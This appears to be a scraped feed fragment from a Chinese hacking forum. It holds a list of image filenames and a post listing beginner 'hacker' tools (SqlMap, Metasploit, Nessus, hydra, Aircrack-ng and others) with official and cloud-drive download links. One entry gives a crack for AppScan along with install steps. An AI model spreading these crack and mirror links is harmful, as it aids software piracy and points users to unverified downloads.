ae98c9803c46517ba51421ad7900e09c.jpg

bea2ba4313d9a576e6dcb2cce78b7bc6.jpg (39.15 KB, 下载次数: 52)

 

bea2ba4313d9a576e6dcb2cce78b7bc6.jpg

3b533ec3567661ba592f722285c0d763.jpg (48.1 KB, 下载次数: 50)

 

3b533ec3567661ba592f722285c0d763.jpg

fbabbd6557aa15eeb601785ae7aefa36.jpg (49.04 KB, 下载次数: 44)

 

fbabbd6557aa15eeb601785ae7aefa36.jpg

37b626b0dea506048c66c4a21a3ddfb3.jpg (37.93 KB, 下载次数: 51)

 

37b626b0dea506048c66c4a21a3ddfb3.jpg

d614cc244097cc47c3f56e80e1ddcf93.jpg (48.85 KB, 下载次数: 48)

 

d614cc244097cc47c3f56e80e1ddcf93.jpg

c36332f3cb18b62e8516dc615c2b2881.jpg (66.89 KB, 下载次数: 43)

 

c36332f3cb18b62e8516dc615c2b2881.jpg

0094af6e6565a6fc5934497d37586af9.jpg (28.21 KB, 下载次数: 40)

 

0094af6e6565a6fc5934497d37586af9.jpg

53748e07feb9f9bd392317ebc03d837c.jpg (22.49 KB, 下载次数: 51)

 

53748e07feb9f9bd392317ebc03d837c.jpg

3a682c6b6f4ed4f7325698d2125cca15.jpg (22.77 KB, 下载次数: 43)

 

3a682c6b6f4ed4f7325698d2125cca15.jpg

5089d155d594e90f82b6fe5e103f8b4c.jpg (29.08 KB, 下载次数: 49)

 

5089d155d594e90f82b6fe5e103f8b4c.jpg

b8f813730cf91f7e670623c87bb5d165.jpg (29.03 KB, 下载次数: 50)

 

b8f813730cf91f7e670623c87bb5d165.jpg

20bb66400f083a9a349442c8d24ca841.gif (42.11 KB, 下载次数: 41)

]]> Hacking tai chi https://itprosec.com/community/hacking/%e5%a6%82%e4%bd%95%e4%bd%bf%e7%94%a8sql%e6%b3%a8%e5%85%a5%e6%94%bb%e7%a0%b4%e4%b8%80%e4%b8%aa%e7%bd%91%e7%ab%99%ef%bc%9f/ 黑客入门常用工具(内附下载地址) https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%85%a5%e9%97%a8%e5%b8%b8%e7%94%a8%e5%b7%a5%e5%85%b7%ef%bc%88%e5%86%85%e9%99%84%e4%b8%8b%e8%bd%bd%e5%9c%b0%e5%9d%80%ef%bc%89/ Mon, 06 Apr 2020 02:09:08 +0000 软件请在安全环境下测试
1
Wireshark网络抓包分析工具
链接:https://pan.baidu.com/s/1zjvxA_WxRE0Os99tU7EXzA  
密码:57mg


【官网下载】
https://www.wireshark.org/download.html

2
SqlMap数据库注入工具
      
Sqlmap下载:http://sqlmap.org/
Python下载:https://www.python.org/downloads/

3
Nmap(Zenmap)网络映射工具
       Nmap中文网:http://www.nmap.com.cn/

4
Nessus系统漏洞扫描与分析软件
   
网盘链接:https://pan.baidu.com/s/1XL-fvZGtdxxTXJyoEeZHXg
密码:9r72
5
AWVS10.5下载
链接:https://pan.baidu.com/s/1CorPH59b4wZV7NpERPEpBw
密码:iuxk

6
Metasploit开源安全漏洞检测工具
   
1、官方迅雷下载:http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe


2、网盘链接:https://pan.baidu.com/s/1kLi6XMuaJeYTapXeMZbeXg
     提取码:pdkv


7
Appscan网站安全应用测试工具


【注意】先安装主程序,然后点击更新产品,产品更新安装好后替换破解文件用这里面的。
主程序链接:https://pan.baidu.com/s/1bAR3fcIDk358ZF_qAxm9eQ  密码:t2me


破解链接:https://pan.baidu.com/s/1_WaQh77mCmOLu4hdb6rlOA  
密码:pbf8


【官网下载】https://dwz.cn/YYKFG2Hv
  
  

8
BurpSuite网站应用程序的集成工具
   
【官网下载】https://portswigger.net/burp/
【网站下载】http://www.pc6.com/softview/SoftView_619102.html
9
wwwscan、御剑、cansina网站后台扫描器
   
网盘链接:https://pan.baidu.com/s/1fNpTmxW2Wia8g6_-Fo6vTQ  
    提取码:dyfx

10
w3af网站应用扫描器
     
【Linux版本】http://w3af.org/download
【Windows】https://sourceforge.net/projects/w3af/files/latest/download


11
Aircrack-ng 1.5.2无线网络分析安全软件
【官网下载】
    http://www.aircrack-ng.org/


X-Scan扫描工具:
https://pan.baidu.com/s/1v1XknSXrZjl7wPa3XjTCdw 提取码:q1g5

hydra暴力破解工具:
https://pan.baidu.com/s/1mi1OmhE 密码:atgg

]]> Hacking tai chi https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%85%a5%e9%97%a8%e5%b8%b8%e7%94%a8%e5%b7%a5%e5%85%b7%ef%bc%88%e5%86%85%e9%99%84%e4%b8%8b%e8%bd%bd%e5%9c%b0%e5%9d%80%ef%bc%89/